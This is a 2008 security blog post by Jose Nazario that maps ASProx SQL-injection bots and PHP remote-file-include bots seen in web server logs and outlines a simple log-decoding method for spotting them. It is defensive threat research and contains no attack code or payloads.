Posted on Wednesday, October 15th, 2008 | Bookmark on del.icio.us

Botnet Visualizations – RFI and SQL Injections

by Jose Nazario

I’ve spent some time in the past couple of weeks digging more into two different kinds of bots and botnets. I culled my data from Oct 1st through 15th to see how widespread these bots are found around the world. Not surprisingly, they’re spread far and wide. Somewhat surprisingly, SQL injection bots are more widely spread than the RFI bots I went looking for.

The first is the ASProx botnet which uses SQL injection attacks to propagate. I’ve been tracking the fast flux domains it uses for malcode hosting, and now I went ahead and looked at the attacking bots themselves. This is based on Apache logfile analysis using a very simple methodology:

  • Look for DECLARE lines in the logfiles
  • Decode the “CAST()” argument into ASCII, either from 8bit or 16bit encoding
  • Find the URL it points to and then analyze that

The result is shown below. These are only the bots doing the attacking, not the locations of the malicious URLs and JavaScript (most of which have been disabled by DNS suspension).

sqlinjectionbots.png

Figure 1: SQL injection bots around the world, Oct 1-15 2008.

The second type of bot I went looking for is the remote file include type of bot (RFI). This is typically a PHP script that gets used to run in the server. Most of the ones I’ve found are checking for inclusion and reporting home. Some are using pBot (a PHP bot) to build zombie armies. Surprisingly, these are not as widespread as the SQL injection bots. Given than these botnets are older, I expected a wider dispersion and more bots out there.

rfibots.png

Figure 2: Remote file include (RFI) bots around the world, Oct 1-15 2008.

But the premise here is pretty simple and effective: a popular website can be analyzed to get a peek into botnet activity. I did this before with Code Red and Nimda worms, and we can do this again with other attack vectors like SQL injection and remote file includes. The trick is to have a web server that gets noticed by these bots.

This entry was posted on Wednesday, October 15th, 2008 at 1:55 pm and is filed under Arbor Networks. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

One Response | Add your own



Comment Post by: Interesting Information Security Bits for 10/16/2008 « Infosec Ramblings — October 16th, 2008 @ 6:23 pm EST  Reply

[...] Botnet Visualizations – RFI and SQL Injections | Security to the Core | Arbor Networks Security This is pretty cool stuff. [...]

Leave a Comment